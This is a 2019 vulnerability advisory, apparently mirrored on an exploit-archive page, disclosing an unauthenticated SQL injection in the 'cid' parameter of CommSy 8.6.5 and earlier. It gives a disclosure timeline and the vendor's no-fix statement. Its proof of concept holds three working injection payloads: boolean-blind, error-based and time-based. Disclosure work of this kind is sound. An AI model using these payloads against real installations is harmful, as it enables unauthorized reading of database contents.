CommSy 8.6.5 – SQL injection

  • 作者: Jens Regel
    日期: 2019-05-15
  • 类别:
  • 来源:
  • Title:
    CommSy 8.6.5 - SQL injection
    Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
    2019-04-15 Vulnerability discovered
    2019-04-15 Asked for security contact and PGP key
    2019-04-16 Send details to the vendor
    2019-05-07 Flaw was approved but will not be fixed in branch 8.6
    2019-05-15 Public disclosure
    Affected Products:
    CommSy <= 8.6.5
    Vendor Homepage:
    Details: ======== CommSy is a web-based community system, originally developed at the University of Hamburg, Germany, to support learning/working communities. We have discovered a unauthenticated SQL injection vulnerability in CommSy <= 8.6.5 that makes it possible to read all database content. The vulnerability exists in the HTTP GET parameter "cid". Proof of Concept: ================= boolean-based blind: commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823 ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login error-based: commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT COUNT(*),CONCAT(0x716a767871,(SELECT (ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login time-based blind: commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login Fix: ==== According to the manufacturer, the version branch 8.6 is no longer supported and the vulnerability will not be fixed. Customers should update to the newest version 9.2.